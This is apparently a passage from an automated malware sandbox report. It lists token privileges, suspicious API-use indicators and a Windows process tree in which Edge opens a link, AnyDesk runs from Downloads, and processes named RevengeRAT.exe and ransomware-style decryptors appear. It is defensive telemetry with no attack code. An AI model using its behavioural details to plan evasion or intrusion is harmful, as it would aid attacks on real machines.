5616 WMIC.exe Token: SeBackupPrivilege 3512 vssvc.exe Token: SeRestorePrivilege 3512 vssvc.exe Token: SeAuditPrivilege 3512 vssvc.exe Token: SeTcbPrivilege 4512 taskse.exe Token: SeTcbPrivilege 4512 taskse.exe Token: SeTcbPrivilege 5328 taskse.exe Token: SeTcbPrivilege 5328 taskse.exe Token: SeTcbPrivilege 6128 taskse.exe Token: SeTcbPrivilege 6128 taskse.exe Token: SeTcbPrivilege 992 taskse.exe Token: SeTcbPrivilege 992 taskse.exe Token: SeTcbPrivilege 5912 taskse.exe Token: SeTcbPrivilege 5912 taskse.exe Token: SeTcbPrivilege 5936 taskse.exe Token: SeTcbPrivilege 5936 taskse.exe Token: SeTcbPrivilege 5204 taskse.exe Token: SeTcbPrivilege 5204 taskse.exe Token: SeDebugPrivilege 5524 RevengeRAT.exe Token: SeDebugPrivilege 5964 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exeAnyDesk.exeAnyDesk.exepid Process 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 220 AnyDesk.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe -
Suspicious use of SendNotifyMessage 52 IoCs
Processes:
msedge.exeAnyDesk.exepid Process 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 1592 AnyDesk.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe -
Suspicious use of SetWindowsHookEx 37 IoCs
Processes:
AnyDesk.exe@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]iexplore.exeWINWORD.EXEWINWORD.EXEpid Process 220 AnyDesk.exe 220 AnyDesk.exe 5340 @[email protected] 5340 @[email protected] 3828 @[email protected] 3828 @[email protected] 1244 @[email protected] 1244 @[email protected] 3244 @[email protected] 3736 @[email protected] 2708 @[email protected] 772 @[email protected] 2768 @[email protected] 3908 @[email protected] 5932 @[email protected] 5320 iexplore.exe 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 1936 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE 5740 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid Process procid_target PID 3060 wrote to memory of 1184 3060 msedge.exe 83 PID 3060 wrote to memory of 1184 3060 msedge.exe 83 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3024 3060 msedge.exe 84 PID 3060 wrote to memory of 3196 3060 msedge.exe 85 PID 3060 wrote to memory of 3196 3060 msedge.exe 85 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 PID 3060 wrote to memory of 1164 3060 msedge.exe 86 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 5548 attrib.exe 5772 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bloxflip.com/a/kriszti1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9d046f8,0x7ffba9d04708,0x7ffba9d047182⤵PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:22⤵PID:3024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:82⤵PID:1164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:12⤵PID:3492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:82⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:12⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:12⤵PID:1140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:3200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:3328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵PID:772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:12⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:12⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:12⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:12⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6548 /prefetch:82⤵PID:5624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:12⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:12⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2752 /prefetch:82⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:12⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5388 /prefetch:82⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
-
C:\Users\Admin\Downloads\AnyDesk.exe"C:\Users\Admin\Downloads\AnyDesk.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1476
-
-
C:\Users\Admin\Downloads\AnyDesk.exe"C:\Users\Admin\Downloads\AnyDesk.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1832 -
C:\Users\Admin\Downloads\AnyDesk.exe"C:\Users\Admin\Downloads\AnyDesk.exe" --local-service3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Users\Admin\Downloads\AnyDesk.exe"C:\Users\Admin\Downloads\AnyDesk.exe" --backend4⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:220
-
-
-
C:\Users\Admin\Downloads\AnyDesk.exe"C:\Users\Admin\Downloads\AnyDesk.exe" --local-control3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1592
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4940 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:12⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:12⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:12⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:12⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:12⤵PID:4404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:12⤵PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:12⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7900 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
